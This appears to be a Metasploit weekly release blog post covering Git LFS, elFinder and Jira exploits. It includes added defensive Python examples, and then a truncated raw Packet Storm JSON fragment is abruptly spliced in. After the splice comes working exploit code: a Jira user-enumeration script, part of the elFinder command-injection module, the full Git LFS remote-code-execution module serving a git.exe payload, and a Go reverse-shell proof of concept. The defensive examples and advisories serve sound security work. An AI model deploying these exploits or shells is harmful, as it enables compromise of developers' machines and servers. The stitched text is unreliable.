
## Clone your way to code execution

We’ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and elFinder lead the pack this week, alongside an information disclosure against Jira and a post-exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever!
## Git push upstream git-lfs:payload
Our own Jack Heysel and Shelby Pace had some fun creating an exploit module targeting GitHub, for a vulnerability originally discovered by Dawid Golunski. The exploit requires a user to clone a malicious GitHub repository to gain remote code execution, and before you ask, we promise it is safe to clone ours.
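The clone-to-code-execution path above comes down to command lookup: when a helper such as Git LFS runs `git` by bare name on Windows, the current directory (the freshly cloned checkout) is searched before `PATH`, so a repository-controlled `git.bat` or `git.exe` wins. The following is an added illustration written for this wrap-up, not code from the Metasploit module or from Git LFS: it models that lookup rule in pure Python against a constructed temporary directory layout (no program is executed), contrasts it with a `PATH`-only lookup, and includes the check a defender can run over a fresh checkout for tool-named files in its root. The `PATHEXT` list is a simplified stand-in for the Windows one.

```python
"""Model of bare-name command resolution and why a cloned repository's
working tree is dangerous when it is searched first.

Added illustration, not Metasploit or Git LFS code. Layout is constructed
in a temp dir; nothing is executed, only paths are resolved.
"""
import os
import tempfile

PATHEXT = (".exe", ".bat", ".cmd")                 # simplified Windows PATHEXT (assumption)
SHADOW_NAMES = tuple("git" + ext for ext in PATHEXT)  # names that would shadow the git tool


def resolve_command(name, path_dirs, cwd, include_cwd):
    """Return the file `name` resolves to, or None.

    include_cwd=True models the behaviour behind the Git LFS bug: the current
    directory (here, the clone) is consulted before the PATH entries.
    """
    search = ([cwd] if include_cwd else []) + list(path_dirs)
    for directory in search:
        for ext in PATHEXT:
            candidate = os.path.join(directory, name + ext)
            if os.path.isfile(candidate):
                return candidate
    return None


def find_shadowing_files(repo_dir, names=SHADOW_NAMES):
    """Defender-side check: top-level files in a checkout whose names collide
    with a tool binary a helper is expected to invoke (case-insensitive)."""
    found = []
    for entry in sorted(os.listdir(repo_dir)):
        if entry.lower() in names and os.path.isfile(os.path.join(repo_dir, entry)):
            found.append(entry)
    return found


def demo():
    """Build the constructed layout and return
    (what an unsafe lookup picks, what a PATH-only lookup picks, shadowing files)."""
    with tempfile.TemporaryDirectory() as root:
        tooldir = os.path.join(root, "tools")        # stands in for a PATH directory
        repo = os.path.join(root, "cloned-repo")     # stands in for the fresh clone
        os.makedirs(tooldir)
        os.makedirs(repo)
        open(os.path.join(tooldir, "git.exe"), "w").close()  # the genuine tool (empty stand-in)
        open(os.path.join(repo, "git.bat"), "w").close()     # repository-controlled file
        unsafe = resolve_command("git", [tooldir], cwd=repo, include_cwd=True)
        safe = resolve_command("git", [tooldir], cwd=repo, include_cwd=False)
        return (os.path.basename(unsafe), os.path.basename(safe), find_shadowing_files(repo))


if __name__ == "__main__":
    print(demo())   # ('git.bat', 'git.exe', ['git.bat'])
```

The fix on the tool side is the `include_cwd=False` branch: resolve helpers by absolute path or a lookup that never consults the working directory. On the user side, `find_shadowing_files` is a cheap pre-use check for a checkout from an untrusted source.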
## Jira users
Brian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) to get a list of Jira users, giving the social engineers among us more targets and login scanners more data. Unfortunately, it does not track my tickets and keep them up to date.
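On the defensive side, user enumeration through a lookup endpoint is visible in web server logs as one source asking about many different accounts in a short window. The following detection sketch is an added example written for this wrap-up, not part of the Metasploit module or of Jira: it parses combined-format access log lines (constructed below), collects the distinct `username` values each client sent to `ViewUserHover.jspa`, and flags sources above a threshold. The `username` query parameter name and the `/secure/` prefix are assumptions; the path match only looks at the endpoint's file name, so either form works.

```python
"""Flag bursts of distinct user lookups against Jira's ViewUserHover.jspa.

Added detection sketch, not Metasploit or Jira code. Log lines below are
constructed; parameter name `username` and the /secure/ prefix are assumed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/Tomcat combined log format: ip ident user [ts] "METHOD url proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client walks several accounts, another makes one lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2021:10:00:01 +0000] "GET /secure/ViewUserHover.jspa?username=admin HTTP/1.1" 200 512
10.0.0.5 - - [17/Sep/2021:10:00:01 +0000] "GET /secure/ViewUserHover.jspa?username=alice HTTP/1.1" 200 498
10.0.0.5 - - [17/Sep/2021:10:00:02 +0000] "GET /secure/ViewUserHover.jspa?username=bob HTTP/1.1" 200 503
10.0.0.5 - - [17/Sep/2021:10:00:02 +0000] "GET /secure/ViewUserHover.jspa?username=svc_backup HTTP/1.1" 200 501
10.0.0.9 - - [17/Sep/2021:10:00:03 +0000] "GET /secure/ViewUserHover.jspa?username=alice HTTP/1.1" 200 498
10.0.0.9 - - [17/Sep/2021:10:00:04 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 9001
"""


def hover_lookups(log_text):
    """Map client IP -> set of usernames it looked up via ViewUserHover.jspa."""
    lookups = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in the expected format
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/ViewUserHover.jspa"):
            continue
        for user in parse_qs(parts.query).get("username", []):
            lookups[m.group("ip")].add(user)
    return lookups


def suspicious_sources(log_text, threshold=3):
    """IPs that looked up at least `threshold` distinct usernames, sorted."""
    return sorted(ip for ip, users in hover_lookups(log_text).items()
                  if len(users) >= threshold)


if __name__ == "__main__":
    for ip in suspicious_sources(SAMPLE_LOG):
        print(f"possible user enumeration from {ip}: "
              f"{sorted(hover_lookups(SAMPLE_LOG)[ip])}")
```

Counting distinct usernames rather than raw requests keeps a single user repeatedly hovering one profile from tripping the rule; in production the threshold would be applied per time window rather than per file.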
## New module content (4)
* [Jira Users Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14631>) by Brian Halbach and Mikhail Klyuchnikov, which exploits [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) - This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the `/ViewUserHover.jspa` endpoint.
* [elFinder Archive Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15658>) by Shelby Pace and Thomas Chauchefoin, which exploits [CVE-2021-32682](<https://attackerkb.com/topics/llBeWZGXq9/cve-2021-32682?referrer=blog>) - This adds an exploit for CVE-2021-32682, an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed.
* [Git Remote Code Execution via git-lfs (CVE-2020-27955)](<https://github.com/rapid7/metasploit-framework/pull/15624>) by Dawid Golunski, [jheysel-r7](<https://github.com/jheysel-r7>), and [space-r7](<https://github.com/space-r7>), which exploits [CVE-2020-27955](<https://attackerkb.com/topics/33ELRpbDyL/cve-2020-27955-git-large-file-storage-git-lfs-git-lfs---remote-code-execution-rce?referrer=blog>) - This adds an exploit for CVE-2020-27955, a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.
* [Geutebruck Camera Deface](<https://github.com/rapid7/metasploit-framework/pull/15601>) by Ibrahim Ayadhi and Sébastien Charbonnier - A new post-exploitation module that takes an existing session on a Geutebruck camera shell and either freezes the current display stream, replaces it with a static image, or restores it so that the current live feed from the camera is displayed again.
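The elFinder entry above describes argument injection rather than shell injection: a user-supplied name can be quoted so that the shell treats it as a single word, yet if that word begins with `-` the invoked program still parses it as an option. The following is an added illustration written for this wrap-up, not elFinder's code or its actual fix. It mirrors `escapeshellarg()`-style quoting with Python's `shlex.quote`, shows the argv the tool would see after the shell parses the quoted string, and then gives a hardened builder that validates the name, anchors every user-derived path with `./`, and keeps argv as a list so no shell is involved. Nothing is executed; the functions only build and inspect argument vectors. The fixed `zip` options are a constructed prefix.

```python
"""Argument injection: quoting stops shell metacharacters, not option parsing.

Added illustration, not elFinder code or its fix. Only argv lists are built
and inspected; no command is run.
"""
import shlex

ARCHIVE_CMD = ["zip", "-r9", "-q"]    # constructed fixed option prefix (assumption)


def build_shell_command(archive_name, targets):
    """'Before': quote each value and splice it into a shell command string,
    the pattern escapeshellarg() is used for in PHP."""
    words = ARCHIVE_CMD + [shlex.quote(archive_name)] + [shlex.quote(t) for t in targets]
    return " ".join(words)


def argv_seen_by_tool(shell_command):
    """What the shell hands to the program after parsing the quoted string."""
    return shlex.split(shell_command)


def injected_options(argv, fixed_prefix=ARCHIVE_CMD):
    """Review helper: user-derived argv entries the tool would treat as options."""
    return [a for a in argv[len(fixed_prefix):] if a.startswith("-")]


def safe_archive_name(name):
    """Reject names that could be read as options or that leave the directory."""
    if not name or name.startswith("-"):
        raise ValueError("archive name may not be empty or start with '-'")
    if "/" in name or "\\" in name or name in (".", ".."):
        raise ValueError("archive name may not contain path separators")
    return name


def build_argv_hardened(archive_name, targets):
    """'After': validate, then anchor every user-derived path with './' so it
    can never be parsed as an option; pass the list to subprocess without a shell."""
    name = safe_archive_name(archive_name)
    return ARCHIVE_CMD + ["./" + name] + ["./" + t for t in targets]


if __name__ == "__main__":
    before = argv_seen_by_tool(build_shell_command("-not-a-name.zip", ["notes.txt"]))
    print(before, injected_options(before))
    print(build_argv_hardened("backup.zip", ["notes.txt"]))
```

Two points to take from it: `shlex.quote` leaves `-not-a-name.zip` untouched because `-` and `.` are shell-safe characters, so the tool receives an option-shaped word; and the `./` anchor is the general fix for any program whose option parser runs before file-name handling, which is why `build_argv_hardened` applies it to the targets as well as the archive name.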
## Enhancements and features
* [#15609](<https://github.com/rapid7/metasploit-framework/pull/15609>) from [adfoster-r7](<https://github.com/adfoster-r7>) - Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.
* [#15674](<https://github.com/rapid7/metasploit-framework/pull/15674>) from [digininja](<https://github.com/digininja>) - Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying whether the module has succeeded.
## Bugs fixed
* [#15667](<https://github.com/rapid7/metasploit-framework/pull/15667>) from [bwatters-r7](<https://github.com/bwatters-r7>) - Fixes `powershell_reverse_tcp` file operations and updates the file operations test module.
## Get it
As always, you can update to the latest Metasploit Framework with `msfupdate`, and you can get more details on the changes since the last blog post from GitHub:
* [Pull Requests 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-08T18%3A07%3A57-05%3A00..2021-09-15T14%3A13%3A18-05%3A00%22>)
* [Full diff 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/compare/6.1.5...6.1.6>)
If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
* _Image credit: Toni Barros from São Paulo, Brasil - Hello, Dolly!, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_
'${IFS}') \n \ncreate_archive(cmd_arg, @archive_name, @txt_file) \nend \n \ndef exploit \nsetup_files_for_sploit \nexecute_cmdstager(noconcat: true, linemax: 150) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164173/elfinder_archive_cmd_injection.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T16:13:34", "description": "", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "packetstorm", "title": "Atlassian JIRA 8.11.1 User Enumeration", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-03-10T00:00:00", "id": "PACKETSTORM:161730", "href": "https://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html", "sourceData": "`# Title: Atlassian JIRA 8.11.1 - User Enumeration \n# Author: Dolev Farhi \n# Vulnerable versions: version < 7.13.16, 8.0.0 \u2264 version < 8.5.7, 8.6.0 \u2264 version < 8.12.0 \n# CVE: CVE-2020-14181 \n# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies. \n \nimport sys \nimport os \nimport requests \n \ndef help(): \nprint('python3 script.py <target> <usernames_file>') \nprint('e.g. 
python3 script.py https://jiratarget.com usernames.txt') \nsys.exit() \n \nif len(sys.argv) < 3: \nhelp() \n \nserver = sys.argv[1] \nusernames = sys.argv[2] \n \nrandom_user = '0x00001' \n \ntry: \nos.path.exists(usernames) \nexcept: \nprint(usernames, 'file does not exist.') \nsys.exit(1) \n \ndef test_vulnerable(): \nresp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) \nif 'User does not exist: {}'.format(random_user) in resp.text: \nreturn True \nreturn False \n \nif test_vulnerable is False: \nprint('server is not vulnerable.') \nsys.exit(1) \n \nf = open(usernames, 'r').read() \n \nfor username in f.splitlines(): \nresp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) \nif 'User does not exist' not in resp.text: \nprint('EXISTS', username) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161730/atlassianjira8111-enumerate.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T16:20:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "packetstorm", "title": "Git git-lfs Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
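For the elFinder module further up, the point worth seeing in code is why `escapeshellarg()` is the wrong defence for the `-TmTT` injection and what the right check looks like. The block below is an added example in Python rather than PHP; it is not elFinder, SonarSource or Rapid7 code. `escapeshellarg()` is reimplemented to PHP's rules, the hardened builder and the log query are this example's own, and the two access-log lines are constructed.

```python
"""Added example: option injection past escapeshellarg() (CVE-2021-32682 shape)."""
import re
import shlex
from typing import List
from urllib.parse import parse_qs, urlsplit


def escapeshellarg(arg: str) -> str:
    """PHP escapeshellarg(): single-quote the value, escaping embedded quotes.

    This neutralises shell metacharacters ($( ), |, ;) so the *shell* never runs a
    second command. It does nothing about the value itself being parsed as an
    option by the program that receives it, which is the actual bug.
    """
    return "'" + arg.replace("'", "'\\''") + "'"


def vulnerable_zip_cmdline(name: str, members: List[str]) -> str:
    """The command shape quoted in the module comment (pre-2.1.59 elFinder):
    zip -r9 -q '<name>' './a.zip' './a.txt'"""
    args = [escapeshellarg(name)] + [escapeshellarg("./" + m) for m in members]
    return "zip -r9 -q " + " ".join(args)


def argv_of(cmdline: str) -> List[str]:
    """The argv the shell hands to zip after quote removal (POSIX rules)."""
    return shlex.split(cmdline)


def is_option_injection(name: str) -> bool:
    """An archive name beginning with '-' is parsed by zip as options. With
    -T (test archive) -m (move inputs) -TT=<cmd> (test command), zip itself runs
    <cmd> through a shell, so the $(...) survives escapeshellarg() and executes."""
    return name.startswith("-")


def hardened_argv(name: str, members: List[str]) -> List[str]:
    """Hardened form: no shell (argv list for proc_open/subprocess), no path
    separators or traversal in the name, and the output anchored with './' so
    the first byte zip sees can never be '-'."""
    if not name or "/" in name or name in (".", ".."):
        raise ValueError("invalid archive name")
    if is_option_injection(name):
        raise ValueError("archive name must not start with '-'")
    return ["zip", "-r9", "-q", "./" + name] + ["./" + m for m in members]


# Constructed sample access log (Apache combined format): one benign request, one hostile.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Sep/2021:10:01:02 +0000] "GET /php/connector.minimal.php?cmd=archive&name=report.zip&target=l1_Lw&type=application/zip&targets[]=l1_YS50eHQ= HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Sep/2021:10:01:07 +0000] "GET /php/connector.minimal.php?cmd=archive&name=-TmTT%3D%22%24(id%3Eout.txt)foooo%22.zip&target=l1_Lw&type=application/zip&targets[]=l1_YS50eHQ= HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
]
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_archive_requests(log_lines: List[str]) -> List[str]:
    """Decoded `name` of every elFinder archive request that zip would read as
    an option: the IOC_IN_LOGS side effect the module declares."""
    hits = []
    for line in log_lines:
        m = _REQ.search(line)
        if not m:
            continue
        q = parse_qs(urlsplit(m.group(1)).query)
        if q.get("cmd") == ["archive"]:
            hits.extend(n for n in q.get("name", []) if is_option_injection(n))
    return hits


MALICIOUS_NAME = '-TmTT="$(id>out.txt)foooo".zip'  # payload shape from the Sonar write-up

if __name__ == "__main__":
    print(vulnerable_zip_cmdline(MALICIOUS_NAME, ["a.zip", "a.txt"]))
    print(argv_of(vulnerable_zip_cmdline(MALICIOUS_NAME, ["a.zip", "a.txt"])))
    print(suspicious_archive_requests(SAMPLE_LOG))
```

Run it and compare the two printed forms: the quoted command line looks safe, but the argv that reaches zip carries `$(` intact in an element that starts with `-`. The fix in 2.1.59 is of the second kind: treat the name as data (reject or prefix), not of the first (more quoting).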
## Packet Storm 164180: Git git-lfs Remote Code Execution (CVE-2020-27955)

Published 2021-09-16. Metasploit module. Page: https://packetstormsecurity.com/files/164180/Git-git-lfs-Remote-Code-Execution.html; source: https://packetstormsecurity.com/files/download/164180/git_lfs_rce.rb.txt (CVSS v3.1 9.8 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Git
  include Msf::Exploit::Git::Lfs
  include Msf::Exploit::Git::SmartHttp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',
        'Description' => %q{
          A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for
          versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked
          into cloning the attacker’s malicious repository using a vulnerable Git version control tool
        },
        'Author' => [
          'Dawid Golunski ', # Discovery
          'space-r7', # Guidance, git mixins
          'jheysel-r7' # Metasploit module
        ],
        'References' => [
          ['CVE', '2020-27955'],
          ['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']
        ],
        'DisclosureDate' => '2020-11-04', # Public disclosure
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Git LFS <= 2.12',
            {
              'Platform' => ['win']
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
          'WfsDelay' => 10
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            ARTIFACTS_ON_DISK
          ]
        }
      )
    )

    register_options([
      OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
    ])
    deregister_options('RHOSTS')
  end

  def setup_repo_structure
    payload_fname = 'git.exe'
    @hook_payload = generate_payload_exe

    ptr_file = generate_pointer_file(@hook_payload)
    git_payload_ptr = GitObject.build_blob_object(ptr_file)

    git_attr_fname = '.gitattributes'
    git_attr_content = "#{payload_fname} filter=lfs diff=lfs merge=lfs"
    git_attr_obj = GitObject.build_blob_object(git_attr_content)

    register_dir_for_cleanup('.git')
    register_files_for_cleanup(git_attr_fname)

    # root of repository
    tree_ent =
      [
        {
          mode: '100644',
          file_name: git_attr_fname,
          sha1: git_attr_obj.sha1
        },
        {
          mode: '100755',
          file_name: payload_fname,
          sha1: git_payload_ptr.sha1
        }
      ]

    tree_obj = GitObject.build_tree_object(tree_ent)
    commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)

    @git_objs =
      [
        commit, tree_obj, git_attr_obj, git_payload_ptr
      ]

    @refs =
      {
        'HEAD' => 'refs/heads/master',
        'refs/heads/master' => commit.sha1
      }
  end

  #
  # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.
  # The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be
  # exploitable by this vulnerability.
  #
  # Returns +true+ if the target is suitable, else fail_with descriptive message
  #
  def target_suitable?(user_agent)
    info = fingerprint_user_agent(user_agent)
    if info[:ua_name] == Msf::HttpClients::UNKNOWN
      fail_with(Failure::NoTarget, "The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0")
    end

    if info[:os_name] == 'Windows' &&
       ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||
        (info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))
      true
    else
      fail_with(Failure::NotVulnerable, "The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}")
    end
  end

  def on_request_uri(cli, req)
    target_suitable?(req.headers['User-Agent'])
    if req.uri.include?('git-upload-pack')
      request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
      case request.type
      when 'ref-discovery'
        response = send_refs(request)
      when 'upload-pack'
        response = send_requested_objs(request)
      else
        fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
      end
    else
      response = handle_lfs_objects(req, @hook_payload, @git_addr)
      unless response.code == 200
        cli.send_response(response)
        fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\'s LFS request')
      end
    end
    cli.send_response(response)
  end

  def create_git_uri
    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
  end

  def primer
    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
    print_status("Git repository to clone: #{@git_addr}")
    hardcoded_uripath(@git_repo_uri)
    hardcoded_uripath("/#{Digest::SHA256.hexdigest(@hook_payload)}")
  end

  def handle_lfs_objects(req, hook_payload, git_addr)
    git_hook_obj = GitObject.build_blob_object(hook_payload)

    case req.method
    when 'POST'
      print_status('Sending payload data...')
      response = get_batch_response(req, git_addr, git_hook_obj)
      fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response
    when 'GET'
      print_status('Sending LFS object...')
      response = get_requested_obj_response(req, git_hook_obj)
      fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response
    else
      fail_with(Failure::UnexpectedReply, 'Unable to handle client\'s request')
    end

    response
  end

  def send_refs(req)
    fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'

    response = get_ref_discovery_response(req, @refs)
    fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response

    response
  end

  def send_requested_objs(req)
    upload_pack_resp = get_upload_pack_response(req, @git_objs)
    unless upload_pack_resp
      fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')
    end

    upload_pack_resp
  end

  def exploit
    setup_repo_structure
    super
  end
end
```

## Packet Storm 159923: git-lfs Remote Code Execution (CVE-2020-27955)

Published 2020-11-06. Go proof of concept by Dawid Golunski. Page: https://packetstormsecurity.com/files/159923/git-lfs-Remote-Code-Execution.html; source: https://packetstormsecurity.com/files/download/159923/git-lfs-RCE-exploit-CVE-2020-27955.go.txt (no CVSS score recorded).

```go
/*
   Go PoC exploit for git-lfs - Remote Code Execution (RCE)
   vulnerability CVE-2020-27955
   git-lfs-RCE-exploit-CVE-2020-27955.go

   Discovered by Dawid Golunski
   https://legalhackers.com
   https://exploitbox.io


   Affected (RCE exploit):
   Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /
   SmartGit / SourceTree etc.
   Basically the whole Windows dev world which uses git.

   Usage:
   Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
   Save & commit as git.exe

   The payload should get executed automatically on git clone operation.
   It spawns a reverse shell, or a calc.exe for testing (if it
   couldn't connect).

   An lfs-enabled repository with lfs files may also be needed so that git-lfs
   gets invoked. This can be achieved with:

   git lfs track "*.dat"
   echo "fat bug file" > lfsdata.dat
   git add .*
   git add *
   git commit -m 'git-lfs exploit' -a

   Check out the full advisory for details:

   https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

   https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

   PoC video at:
   https://youtu.be/tlptOf9w274

   ** For testing purposes only **


*/

package main

import (
	"bufio"
	"net"
	"os/exec"
	"syscall"
)

func revsh(host string) {

	c, err := net.Dial("tcp", host)
	if nil != err {
		// Conn failed
		if nil != c {
			c.Close()
		}
		// Calc for testing purposes if no listener available
		cmd := exec.Command("calc")
		cmd.Run()
		return
	}

	r := bufio.NewReader(c)
	for {
		runcmd, err := r.ReadString('\n')
		if nil != err {
			c.Close()
			return
		}
		cmd := exec.Command("cmd", "/C", runcmd)
		cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
		out, _ := cmd.CombinedOutput()
		c.Write(out)
	}
}

// Connect to netcat listener on local port 1337
func main() {
	revsh("localhost:1337")
}
```

-- Regards, Dawid Golunski, https://legalhackers.com, https://ExploitBox.io, t: @dawid_golunski

## OSV advisory: elFinder 2.1.58 multiple vulnerabilities, fixed in 2.1.59

Published 2021-06-16.

### Impact

We recently fixed several vulnerabilities affecting elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration.

### Patches

The issues were addressed in our last release, 2.1.59.

### Workarounds

If you can't update to 2.1.59, make sure your connector is not exposed without authentication.

### Reference

Further technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.

### For more information

If you have any questions or comments about this advisory, you can contact:
 - The original reporters, by sending an email to vulnerability.research@sonarsource.com;
 - The maintainers, by opening an issue on this repository.
Record OSV:GHSA-WPH3-44RJ-92PR, https://osv.dev/vulnerability/GHSA-wph3-44rj-92pr, titled "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE" (CVE-2021-32682); CVSS v3.1 9.8 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; last modified 2022-08-11.

## OSV:GHSA-4G4P-42WC-9F3M: Git LFS can execute a Git binary from the current directory (CVE-2020-27955)

Published 2022-02-11, last modified 2022-04-20. https://osv.dev/vulnerability/GHSA-4g4p-42wc-9f3m (CVSS v3.1 9.8 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C).

### Impact
On Windows, if Git LFS operates on a malicious repository with a `git.bat` or `git.exe` file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.

This occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.

### Patches
This version should be patched in v2.12.1, which will be released in coordination with this security advisory.

### Workarounds
Other than avoiding untrusted repositories, there is no workaround.

### For more information
If you have any questions or comments about this advisory:
* Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).
* If you cannot open a discussion, please email the core team using their usernames at `github.com`.

## OSV:GHSA-CX3W-XQMC-84G5: Git LFS can execute a Git binary from the current directory on Windows (CVE-2020-27955, CVE-2021-21237)

Published 2022-02-15, last modified 2022-04-20. https://osv.dev/vulnerability/GHSA-cx3w-xqmc-84g5 (CVSS v3.1 9.8 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C).

### Impact
On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.

This is the result of an incomplete fix for CVE-2020-27955.

This issue occurs because on Windows, [Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator](https://github.com/golang/go/issues/38736).

### Patches
This version should be patched in v2.13.2, which will be released in coordination with this security advisory.

### Workarounds
Other than avoiding untrusted repositories or using a different operating system, there is no workaround.

### For more information
If you have any questions or comments about this advisory:

- Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).
- If you cannot open a discussion, please email the core team using their usernames at `github.com`.
